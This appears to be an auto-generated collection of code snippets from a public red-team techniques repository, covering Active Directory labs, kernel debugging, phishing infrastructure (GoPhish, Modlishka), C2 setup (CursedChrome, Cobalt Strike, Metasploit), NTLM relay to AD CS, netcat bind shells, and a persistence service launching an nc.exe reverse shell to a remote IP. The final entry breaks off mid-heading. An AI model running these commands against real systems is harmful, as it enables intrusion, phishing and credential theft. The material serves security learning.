### Start Neo4j Database Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux.md Starts the neo4j database service in the console. This is typically the first step after installation to configure database credentials. ```csharp neo4j console ``` -------------------------------- ### Clone and Install Kali VM Tools Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-lab-with-hyper-v-and-powershell.md Clone the necessary tools from GitHub and execute the installation script for Kali Linux 2020.x. A reboot is required after installation. ```bash sudo git clone https://github.com/mimura1133/linux-vm-tools /opt/linux-vm-tools sudo chmod 0755 /opt/linux-vm-tools/kali/2020.x/install.sh sudo /opt/linux-vm-tools/kali/2020.x/install.sh sudo reboot -f ``` -------------------------------- ### Setup CursedChrome C2 Server Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/lateral-movement/man-in-the-browser-via-chrome-extension.md Clone the CursedChrome repository and start the C2 server using Docker Compose. Note the default username and password for the web console. ```bash git clone https://github.com/mandatoryprogrammer/CursedChrome.git /opt/ cd /opt/CursedChrome docker-compose up -d redis db docker-compose up cursedchrome ``` -------------------------------- ### Install GoPhish on Ubuntu VPS Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/initial-access/phishing-with-gophish-and-digitalocean.md Download the GoPhish binary, install unzip, extract the archive, and make the GoPhish executable. This prepares the GoPhish application for execution. ```bash wget https://github.com/gophish/gophish/releases/download/0.7.1/gophish-v0.7.1-linux-64bit.zip apt install unzip unzip gophish-v0.7.1-linux-64bit.zip chmod +x gophish ``` -------------------------------- ### Start Kernel Debugging on Debuggee Host Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/miscellaneous-reversing-forensics/windows-kernel/configuring-kernel-debugging-environment-with-kdnet-and-windbg-preview.md Run this command on the remote machine (debuggee) to initiate the kernel debugging setup. It specifies the IP address and port of the local machine (debugger). ```text kdnet 192.168.2.79 50001 ``` -------------------------------- ### Empire Listener Setup Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/red-team-infrastructure/powershell-empire-101.md Use these Empire commands to set up a meterpreter listener. Ensure the listener is started with the 'execute' command. ```powershell uselistener meterpreter info ``` ```powershell execute ``` -------------------------------- ### Start Responder Listener Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/initial-access/t1187-forced-authentication.md Starts Responder to listen for authentication requests on a specified network interface. Ensure Responder is installed and the interface is correctly identified. ```csharp responder -I eth1 ``` -------------------------------- ### Install BloodHound on Kali Linux Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux.md Use this command to install BloodHound via apt-get. The Neo4j database, a requirement for BloodHound, will also be installed. ```bash apt-get install bloodhound ``` -------------------------------- ### Launch GoPhish Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/initial-access/phishing-with-gophish-and-digitalocean.md Execute the GoPhish binary to start the phishing server. The admin panel will be accessible after this step. ```bash ./gophish ``` -------------------------------- ### Install impacket Dependencies Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate.md Install all the necessary dependencies for the impacket library within the activated virtual environment. This command installs the package from the current directory. ```bash pip install . ``` -------------------------------- ### Set up Simple HTTP Server Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/offensive-security-cheetsheets/README.md Starts a simple HTTP server for file sharing using Python, Ruby, or PHP. ```bash # Linux python -m SimpleHTTPServer 80 python3 -m http.server ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start" php -S 0.0.0.0:80 ``` -------------------------------- ### Install Postfix on Ubuntu VPS Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/initial-access/phishing-with-gophish-and-digitalocean.md Connect to the DigitalOcean VPS via SSH and install the Postfix mail delivery agent. This is a prerequisite for sending emails. ```bash ssh root@68.183.113.176 apt-get install postfix ``` -------------------------------- ### Start WebClient Service Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate.md This C++ code snippet forces the WebClient service to start on a Windows system. It is useful when the service is not running and administrative rights are not directly available to start it. ```cpp // Code from https://www.tiraniddo.dev/2015/03/starting-webclient-service.html #include #include int main() { const GUID _MS_Windows_WebClntLookupServiceTrigger_Provider = { 0x22B6D684, 0xFA63, 0x4578, { 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7 } }; REGHANDLE Handle; bool success = false; if (EventRegister(&_MS_Windows_WebClntLookupServiceTrigger_Provider, nullptr, nullptr, &Handle) == ERROR_SUCCESS) { EVENT_DESCRIPTOR desc; EventDescCreate(&desc, 1, 0, 0, 4, 0, 0, 0); success = EventWrite(Handle, &desc, 0, nullptr) == ERROR_SUCCESS; EventUnregister(Handle); } return success; } ``` -------------------------------- ### Install Certbot and Download Modlishka Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/red-team-infrastructure/how-to-setup-modliska-reverse-http-proxy-for-phishing.md Installs Certbot and downloads the Modlishka binary. Ensures the binary is executable and lists its details. ```bash apt install certbot wget https://github.com/drk1wi/Modlishka/releases/download/v.1.1.0/Modlishka-linux-amd64 chmod +x Modlishka-linux-amd64 ; ls -lah ``` -------------------------------- ### Launch Modlishka with Configuration Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/red-team-infrastructure/how-to-setup-modliska-reverse-http-proxy-for-phishing.md Starts the Modlishka reverse proxy using the specified configuration file. This command initiates the phishing proxy. ```csharp ./Modlishka-linux-amd64 -config modlishka.json ``` -------------------------------- ### Setup Listener on Port 22 Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/lateral-movement/simple-tcp-relaying-with-netcat.md Initiates a NetCat listener on port 22 to receive incoming connections. ```bash nc -lvvp 22 ``` -------------------------------- ### Start Keylogger on a Process Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/red-team-infrastructure/cobalt-strike-101-installation-and-interesting-commands.md Initiate a keylogger on a specified process by providing the PID and architecture. ```csharp beacon> keylogger 1736 x64 ``` -------------------------------- ### JDWP RCE Example Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/offensive-security-cheetsheets/README.md Demonstrates Remote Code Execution (RCE) via Java Debug Wire Protocol (JDWP). This example executes the 'whoami' command. ```java print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("whoami").getInputStream())).readLine()) ``` -------------------------------- ### Start Cobalt Strike Client Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/red-team-infrastructure/cobalt-strike-101-installation-and-interesting-commands.md Launches the Cobalt Strike client application on your attacker machine. This connects to the running team server. ```bash root@/opt/cobaltstrike# ./cobaltstrike ``` -------------------------------- ### Create and Start ETW Trace Session Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/defense-evasion/parent-process-id-ppid-spoofing.md Creates a trace session named 'ppid-spoofing' and enables the Microsoft-Windows-Kernel-Process provider with a specific keyword (0x10) to capture process-related events. The trace session is then started. ```bash logman create trace ppid-spoofing -p Microsoft-Windows-Kernel-Process 0x10 -ets logman start ppid-spoofing ``` -------------------------------- ### Start Netcat Listener on Localhost Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/lateral-movement/ssh-tunnelling-port-forwarding.md This command starts a Netcat listener on port 4444, bound specifically to localhost (127.0.0.1). This ensures the listener is only accessible from the compromised machine itself, making remote port forwarding necessary for external access. ```bash nc -lp 4444 -s 127.0.0.1 -e /bin/bash & ss -lt ``` -------------------------------- ### WinRM Event Log Entry Example Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/lateral-movement/t1028-winrm-for-lateral-movement.md An example of a WinRM operational event log entry, detailing connection initiation information such as the remote host, process ID, and correlation activity ID. ```markup - - 6 0 4 3 1 0x4000000000000002 # connection iniation time 673 # a unique connection ID # process ID that initiated the connection Microsoft-Windows-WinRM/Operational PC-MANTVYDAS.offense.local - # remote host the connection was initiated to dc-mantvydas/wsman?PSVersion=5.1.14409.1005 ``` -------------------------------- ### Get Injected Thread Start Address in WinDBG Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/miscellaneous-reversing-forensics/get-injectedthread.md Use the '~.' command in WinDBG to get the StartAddress of the currently selected thread. This is crucial for inspecting the shellcode's execution location. ```plaintext ~. ``` -------------------------------- ### PowerShell Function to Install Kernel Driver Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/miscellaneous-reversing-forensics/windows-kernel-internals/loading-a-windows-kernel-driver-osr-driver-loader-debugging-with-source-code.md A PowerShell function to automate the installation of a kernel driver. It stops, deletes, copies, creates, and starts the driver service. Ensure WinDBG is attached to the debugee for this to work effectively. ```powershell function Install-Driver($name) { $cleanName = $name -replace ".sys|.\", "" sc.exe stop $cleanName sc.exe delete $cleanName cp $name c:\windows\system32\drivers\ -verbose -force sc.exe create $cleanName type= kernel start= demand error= normal binPath= c:\windows\System32\Drivers\$cleanName.sys DisplayName= $cleanName sc.exe start $cleanName } ``` -------------------------------- ### Compile and Run Bootloader Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/miscellaneous-reversing-forensics/windows-kernel-internals/writing-a-custom-bootloader.md Commands to compile an assembly bootloader file using NASM and then execute it with QEMU. Ensure NASM is installed and in your PATH. ```bash nasm -f bin .\bootloader-x.asm -o bootloader.bin qemu-system-x86_64.exe C:\labs\bootloader\bootloader.bin ``` -------------------------------- ### Get Pointer to First LDR_DATA_TABLE_ENTRY Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/code-injection-process-injection/finding-kernel32-base-and-function-addresses-in-shellcode.md Retrieve the memory address of the first LDR_DATA_TABLE_ENTRY structure from the PEB.LDR.InMemoryOrderModuleList. This is the starting point for iterating through loaded modules. ```debugger ? poi(poi(@$peb+0xc)+0x14) ``` -------------------------------- ### Setup Metasploit Handler Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/defense-evasion/bypassing-windows-defender-one-tcp-socket-away-from-meterpreter-and-cobalt-strike-beacon.md Configure msfconsole to listen for incoming Meterpreter sessions. Set the appropriate LHOST and LPORT to match your payload configuration. ```bash msfconsole -x "use exploits/multi/handler; set lhost 10.0.0.5; set lport 443; set payload windows/meterpreter/reverse_tcp; exploit" ``` -------------------------------- ### Kernel Driver Setup and Notification Subscription Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/miscellaneous-reversing-forensics/windows-kernel-internals/subscribing-to-process-creation-thread-creation-and-image-load-notifications-from-a-kernel-driver.md This C++ code demonstrates the core structure of a Windows kernel driver, including device creation, I/O control code definition, and subscription to various system notification routines. ```cpp #include #include #include DRIVER_DISPATCH HandleCustomIOCTL; #define IOCTL_SPOTLESS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2049, METHOD_BUFFERED, FILE_ANY_ACCESS) UNICODE_STRING DEVICE_NAME = RTL_CONSTANT_STRING(L"\Device\SpotlessDevice"); UNICODE_STRING DEVICE_SYMBOLIC_NAME = RTL_CONSTANT_STRING(L"\??\SpotlessDeviceLink"); void sCreateProcessNotifyRoutine(HANDLE ppid, HANDLE pid, BOOLEAN create) { if (create) { PEPROCESS process = NULL; PUNICODE_STRING parentProcessName = NULL, processName = NULL; PsLookupProcessByProcessId(ppid, &process); SeLocateProcessImageName(process, &parentProcessName); PsLookupProcessByProcessId(pid, &process); SeLocateProcessImageName(process, &processName); DbgPrint("%d %wZ\n\t\t%d %wZ", ppid, parentProcessName, pid, processName); } else { DbgPrint("Process %d lost child %d", ppid, pid); } } void sCreateProcessNotifyRoutineEx(PEPROCESS process, HANDLE pid, PPS_CREATE_NOTIFY_INFO createInfo) { UNREFERENCED_PARAMETER(process); UNREFERENCED_PARAMETER(pid); if (createInfo != NULL) { if (wcsstr(createInfo->CommandLine->Buffer, L"notepad") != NULL) { DbgPrint("[!] Access to launch notepad.exe was denied!"); createInfo->CreationStatus = STATUS_ACCESS_DENIED; } } } void sLoadImageNotifyRoutine(PUNICODE_STRING imageName, HANDLE pid, PIMAGE_INFO imageInfo) { UNREFERENCED_PARAMETER(imageInfo); PEPROCESS process = NULL; PUNICODE_STRING processName = NULL; PsLookupProcessByProcessId(pid, &process); SeLocateProcessImageName(process, &processName); DbgPrint("%wZ (%d) loaded %wZ", processName, pid, imageName); } void sCreateThreadNotifyRoutine(HANDLE pid, HANDLE tid, BOOLEAN create) { if (create) { DbgPrint("%d created thread %d", pid, tid); } else { DbgPrint("Thread %d of process %d exited", tid, pid); } } void DriverUnload(PDRIVER_OBJECT dob) { DbgPrint("Driver unloaded, deleting symbolic links and devices"); IoDeleteDevice(dob->DeviceObject); IoDeleteSymbolicLink(&DEVICE_SYMBOLIC_NAME); PsSetCreateProcessNotifyRoutine(sCreateProcessNotifyRoutine, TRUE); PsRemoveLoadImageNotifyRoutine(sLoadImageNotifyRoutine); PsRemoveCreateThreadNotifyRoutine(sCreateThreadNotifyRoutine); PsSetCreateProcessNotifyRoutineEx(sCreateProcessNotifyRoutineEx, TRUE); } NTSTATUS HandleCustomIOCTL(PDEVICE_OBJECT DeviceObject, PIRP Irp) { UNREFERENCED_PARAMETER(DeviceObject); PIO_STACK_LOCATION stackLocation = NULL; CHAR *messageFromKernel = "ohai from them kernelz"; stackLocation = IoGetCurrentIrpStackLocation(Irp); if (stackLocation->Parameters.DeviceIoControl.IoControlCode == IOCTL_SPOTLESS) { DbgPrint("IOCTL_SPOTLESS (0x%x) issued", stackLocation->Parameters.DeviceIoControl.IoControlCode); DbgPrint("Input received from userland: %s", (char*)Irp->AssociatedIrp.SystemBuffer); } Irp->IoStatus.Information = strlen(messageFromKernel); Irp->IoStatus.Status = STATUS_SUCCESS; DbgPrint("Sending to userland: %s", messageFromKernel); RtlCopyMemory(Irp->AssociatedIrp.SystemBuffer, messageFromKernel, strlen(Irp->AssociatedIrp.SystemBuffer)); IoCompleteRequest(Irp, IO_NO_INCREMENT); return STATUS_SUCCESS; } NTSTATUS MajorFunctions(PDEVICE_OBJECT DeviceObject, PIRP Irp) { UNREFERENCED_PARAMETER(DeviceObject); PIO_STACK_LOCATION stackLocation = NULL; stackLocation = IoGetCurrentIrpStackLocation(Irp); switch (stackLocation->MajorFunction) { case IRP_MJ_CREATE: DbgPrint("Handle to symbolink link %wZ opened", DEVICE_SYMBOLIC_NAME); break; case IRP_MJ_CLOSE: DbgPrint("Handle to symbolink link %wZ closed", DEVICE_SYMBOLIC_NAME); break; default: break; } Irp->IoStatus.Information = 0; Irp->IoStatus.Status = STATUS_SUCCESS; IoCompleteRequest(Irp, IO_NO_INCREMENT); return STATUS_SUCCESS; } NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { UNREFERENCED_PARAMETER(DriverObject); UNREFERENCED_PARAMETER(RegistryPath); NTSTATUS status = 0; // routine that will execute when our driver is unloaded/service is stopped DriverObject->DriverUnload = DriverUnload; // routine for handling IO requests from userland DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = HandleCustomIOCTL; // routines that will execute once a handle to our device's symbolik link is opened/closed DriverObject->MajorFunction[IRP_MJ_CREATE] = MajorFunctions; DriverObject->MajorFunction[IRP_MJ_CLOSE] = MajorFunctions; DbgPrint("Driver loaded"); // subscribe to notifications PsSetCreateProcessNotifyRoutine(sCreateProcessNotifyRoutine, FALSE); PsSetLoadImageNotifyRoutine(sLoadImageNotifyRoutine); PsSetCreateThreadNotifyRoutine(sCreateThreadNotifyRoutine); PsSetCreateProcessNotifyRoutineEx(sCreateProcessNotifyRoutineEx, FALSE); DbgPrint("Listeners isntalled.."); ``` -------------------------------- ### Get PEB Ldr Data Entry Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/miscellaneous-reversing-forensics/process-environment-block.md Retrieve the address of the first _LIST_ENTRY structure within the PEB's Ldr field. This is the starting point for enumerating loaded modules. ```cpp dt _peb @$peb ldr->InMemoryOrderModuleList* ntdll!_PEB +0x018 Ldr : +0x020 InMemoryOrderModuleList : _LIST_ENTRY [ 0x00000000`002a2980 - 0x00000000`002a1e40 ] ``` -------------------------------- ### Setup NTLM Relay for ADCS Attack Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate.md Configure and start the ntlmrelayx.py script to listen for NTLM authentications. It forwards these authentications to the specified AD CS HTTP endpoint for certificate enrollment, enabling the ADCS attack. ```bash examples/ntlmrelayx.py -t http://ca01/certsrv/certfnsh.asp -smb2support --adcs ``` -------------------------------- ### Emulate Bootloader with QEMU Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/miscellaneous-reversing-forensics/windows-kernel-internals/writing-a-custom-bootloader.md This command loads and executes a bootloader binary using the QEMU emulator. Ensure QEMU is in your system's PATH or provide the full path to the executable. ```bash cd c:\program files\qemu qemu-system-x86_64.exe C:\labs\bootloader\bootloader.bin ``` -------------------------------- ### Netcat listener on Linux piping to file Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/defense-evasion/bypassing-ids-signatures-with-simple-reverse-shells.md Command to start a Netcat listener on a Linux machine, listening on port 443 in verbose mode, and piping all incoming data to a file named 'myfile'. This setup is used in conjunction with the Python decoding script. ```bash nc -lvvp 443 | tee myfile ``` -------------------------------- ### Spawn Notepad Process with Frida Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/miscellaneous-reversing-forensics/windows-kernel-internals/instrumenting-windows-apis-with-frida.md Use this command to launch a new instance of Notepad.exe and have Frida automatically attach to it for instrumentation. ```bash frida c:\windows\system32\notepad.exe ``` -------------------------------- ### AES CBC Encryption and Decryption Example Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/miscellaneous-reversing-forensics/aes-encryption-example-using-cryptopp-.lib-in-visual-studio-c++.md This C++ code demonstrates AES CBC mode encryption and decryption using the Crypto++ library. It includes setup for the key, initialization vector (IV), and utilizes StringSource and StreamTransformationFilter for processing. Ensure the cryptlib.lib is compiled and linked correctly. ```cpp // code copy pasted from here https://www.cryptopp.com/w/images/b/bd/AES-CBC-Filter.zip // crypto.cpp : This file contains the 'main' function. Program execution begins and ends there. // #include "pch.h" #include #include "aes.h" #include #include "osrng.h" using CryptoPP::AutoSeededRandomPool; #include using std::cout; using std::cerr; using std::endl; #include using std::string; #include using std::exit; #include "cryptlib.h" using CryptoPP::Exception; #include "hex.h" using CryptoPP::HexEncoder; using CryptoPP::HexDecoder; #include "filters.h" using CryptoPP::StringSink; using CryptoPP::StringSource; using CryptoPP::StreamTransformationFilter; #include "aes.h" using CryptoPP::AES; #include "ccm.h" using CryptoPP::CBC_Mode; #include "assert.h" int main(int argc, char* argv[]) { AutoSeededRandomPool prng; byte key[AES::DEFAULT_KEYLENGTH]; prng.GenerateBlock(key, sizeof(key)); byte iv[AES::BLOCKSIZE]; prng.GenerateBlock(iv, sizeof(iv)); string plain = "CBC Mode Test"; string cipher, encoded, recovered; /*********************************\ \*********************************/ // Pretty print key encoded.clear(); StringSource(key, sizeof(key), true, new HexEncoder( new StringSink(encoded) ) // HexEncoder ); // StringSource cout << "key: " << encoded << endl; // Pretty print iv encoded.clear(); StringSource(iv, sizeof(iv), true, new HexEncoder( new StringSink(encoded) ) // HexEncoder ); // StringSource cout << "iv: " << encoded << endl; /*********************************\ \*********************************/ try { cout << "plain text: " << plain << endl; CBC_Mode< AES >::Encryption e; e.SetKeyWithIV(key, sizeof(key), iv); // The StreamTransformationFilter removes // padding as required. StringSource s(plain, true, new StreamTransformationFilter(e, new StringSink(cipher) ) // StreamTransformationFilter ); // StringSource #if 0 StreamTransformationFilter filter(e); filter.Put((const byte*)plain.data(), plain.size()); filter.MessageEnd(); const size_t ret = filter.MaxRetrievable(); cipher.resize(ret); filter.Get((byte*)cipher.data(), cipher.size()); #endif } catch (const CryptoPP::Exception& e) { cerr << e.what() << endl; exit(1); } /*********************************\ \*********************************/ // Pretty print encoded.clear(); StringSource(cipher, true, new HexEncoder( new StringSink(encoded) ) // HexEncoder ); // StringSource cout << "cipher text: " << encoded << endl; /*********************************\ \*********************************/ try { CBC_Mode< AES >::Decryption d; d.SetKeyWithIV(key, sizeof(key), iv); // The StreamTransformationFilter removes // padding as required. StringSource s(cipher, true, new StreamTransformationFilter(d, new StringSink(recovered) ) // StreamTransformationFilter ); // StringSource #if 0 StreamTransformationFilter filter(d); filter.Put((const byte*)cipher.data(), cipher.size()); filter.MessageEnd(); const size_t ret = filter.MaxRetrievable(); recovered.resize(ret); filter.Get((byte*)recovered.data(), recovered.size()); #endif cout << "recovered text: " << recovered << endl; } catch (const CryptoPP::Exception& e) { cerr << e.what() << endl; exit(1); } /*********************************\ \*********************************/ return 0; } ``` -------------------------------- ### Calling NtCreateFile Syscall Stub Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/defense-evasion/retrieving-ntdll-syscall-stubs-at-run-time.md Demonstrates the invocation of the NtCreateFile syscall after its stub has been retrieved and made executable. This example opens a handle to 'c:\temp\pw.log' for writing. ```cpp NtCreateFile( &fileHandle, FILE_GENERIC_WRITE, &oa, &osb, 0, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0 ); ``` -------------------------------- ### Query Service Configuration Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/privilege-escalation/weak-service-permissions.md Use the 'sc.exe qc' command to query and display the current configuration of a service, including its binary path. This is useful for verifying the service's setup before attempting to overwrite its binary. ```bash sc.exe qc evilsvc ``` -------------------------------- ### Compile and Run Vulnerable C Program Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/code-injection-process-injection/binary-exploitation/format-string-bug.md Demonstrates the compilation and execution of the vulnerable C program. Running without arguments shows the error message. This is a basic setup step before exploitation. ```bash gcc .\fmt.c -o fmt.exe; .\fmt.exe ``` -------------------------------- ### Establish Persistence via Windows Services Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/offensive-security-cheetsheets/README.md Create a new service using 'sc' (cmd) or 'New-Service' (PowerShell) to establish persistence. The 'binpath' specifies the executable to run, and 'obj' sets the service account. ```csharp # cmd sc create spotlessSrv binpath= "C:\nc.exe 10.11.0.245 443 -e C:\WINDOWS\System32\cmd.exe" obj= "LocalSystem" password= "" # powersehll New-Service -Name EvilName -DisplayName EvilSvc -BinaryPathName "'C:\Program Files\NotEvil\back.exe'" -Description "Not at all" ``` -------------------------------- ### Query for Service Installation Events Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/enumeration-and-discovery/windows-event-ids-for-situational-awareness.md Use this PowerShell command to retrieve security logs related to the attempt to install a service. This event ID (4697) is crucial for detecting unauthorized service installations. ```powershell Get-WinEvent -FilterHashtable @{ LogName='Security'; Id='4697' } ``` -------------------------------- ### RPC, NetBios, and SMB Enumeration Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/offensive-security-cheetsheets/README.md Commands for enumerating RPC, NetBios, and SMB services on a target. ```bash rpcinfo -p $TARGET ``` ```bash nbtscan $TARGET ``` ```bash #list shares smbclient -L //$TARGET -U "" ``` ```bash # null session rpcclient -U "" $TARGET ``` ```bash smbclient -L //$TARGET ``` ```bash enum4linux $TARGET ``` -------------------------------- ### Promote Computer to Domain Controller Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-lab-with-hyper-v-and-powershell.md This script configures a Windows Server VM as a Domain Controller for a new Active Directory domain. It sets a static IP, installs AD DS and DNS roles, and creates the 'offense.local' domain. Ensure the administrator password and VM name are adjusted as needed. ```csharp $plainPassword = "123456" $password = $plainPassword | ConvertTo-SecureString -asPlainText -Force $credential = New-Object System.Management.Automation.PSCredential("administrator", $password) $session = New-PSSession -Vmname dc01 -Credential $credential -Verbose $code = { $plainPassword = "123456" $password = $plainPassword | ConvertTo-SecureString -asPlainText -Force $credential = New-Object System.Management.Automation.PSCredential("administrator", $password) netsh int ip set address "ethernet" static 10.0.0.6 255.255.255.0 10.0.0.6 1 netsh int ip set dns "ethernet" static 10.0.0.6 primary $domainName = "offense" $domain = "$domainName.local" Write-Host "Installing management tools" Import-Module ServerManager Add-WindowsFeature RSAT-AD-PowerShell,RSAT-AD-AdminCenter Write-Host "Deploying Active Directory Domain..." Install-WindowsFeature AD-domain-services, DNS -IncludeAllSubFeature -IncludeManagementTools -Restart Import-Module ADDSDeployment Install-ADDSForest ` -SafeModeAdministratorPassword $password ` -CreateDnsDelegation:$false ` -DatabasePath "C:\\Windows\\NTDS" ` -DomainMode "7" ` -DomainName $domain ` -DomainNetbiosName $domainName ` -ForestMode "7" ` -InstallDns:$true ` -LogPath "C:\\Windows\\NTDS" ` -NoRebootOnCompletion:$true ` -SysvolPath "C:\\Windows\\SYSVOL" ` -Force:$true Restart-Computer -Force -Verbose } Invoke-Command -Session $session -ScriptBlock $code ``` -------------------------------- ### Start w32time Service Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/persistence/t1209-hijacking-time-providers.md This command starts the Windows Time service. It is used to initiate the execution of the potentially hijacked DLL. ```csharp C:\Users\mantvydas\Start Menu\Programs\Startup>sc.exe start w32time SERVICE_NAME: w32time TYPE : 20 WIN32_SHARE_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 964 FLAGS : ``` -------------------------------- ### Start EvilSvc Service Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/persistence/persisting-in-svchost.exe-with-a-service-dll-servicemain.md This command starts the 'EvilSvc' service. If configured correctly, this will cause svchost.exe to load the 'EvilSvc.dll' and execute its code. ```bash sc.exe start EvilSvc ``` -------------------------------- ### Install Postfix MTA Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/red-team-infrastructure/smtp.md Installs the Postfix Mail Transfer Agent on an Ubuntu system. This is the initial step in setting up an SMTP relay server. ```bash apt-get install postfix ``` -------------------------------- ### Start Netcat Listener Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/code-execution/binary-exploitation/stack-based-buffer-overflow.md Use this command to start a netcat listener on a specific IP address and port to catch incoming reverse shells. ```bash nc -lvp 443 ``` -------------------------------- ### Join Computer to Domain with PowerShell Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-lab-with-hyper-v-and-powershell.md Establishes a PowerShell Remoting session to join a workstation to the domain, configuring IP/DNS settings and adding the computer to 'offense.local'. Ensure the VM name and domain are correct. ```powershell $plainPassword = "123456" $password = $plainPassword | ConvertTo-SecureString -asPlainText -Force $credential = New-Object System.Management.Automation.PSCredential("mantvydas", $password) $session = New-PSSession -Vmname ws01 -Credential $credential -Verbose $code = { netsh int ip set address "ethernet" static 10.0.0.7 255.255.255.0 10.0.0.6 1 netsh int ip set dns "ethernet" static 10.0.0.6 primary $plainPassword = "123456" $password = $plainPassword | ConvertTo-SecureString -asPlainText -Force $credential = New-Object System.Management.Automation.PSCredential("administrator", $password) Add-computer -computername ws01 -domain offense.local -domaincredential $credential -Verbose -Restart } Invoke-Command -Session $session -ScriptBlock $code ``` -------------------------------- ### Get EPROCESS Structure Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/miscellaneous-reversing-forensics/windows-kernel/manipulating-activeprocesslinks-to-unlink-processes-in-userland.md Use the '!process' command in WinDbg to get detailed information about a running process, including its EPROCESS structure address. ```windbg kd> !process e14 0 ``` -------------------------------- ### Enumerate Unquoted Service Paths Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/privilege-escalation/unquoted-service-paths.md This command lists services configured to start automatically, excluding those in 'c:\windows\', and filters for services whose binary paths are not enclosed in quotes. This helps identify potential unquoted service path vulnerabilities. ```bash cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\" |findstr /i /v """ ``` -------------------------------- ### Start Vulnerable Service Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/privilege-escalation/weak-service-permissions.md Start the vulnerable service after its configuration has been modified. This action triggers the execution of the malicious binary specified in the service's configuration. ```bash .\sc.exe start evilsvc ``` -------------------------------- ### List Docker Images Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/red-team-infrastructure/spiderfoot-101-with-kali-using-docker.md Verify that the 'spiderfoot' Docker image has been successfully created. ```docker docker images ``` -------------------------------- ### Install Python Virtual Environment Package Source: 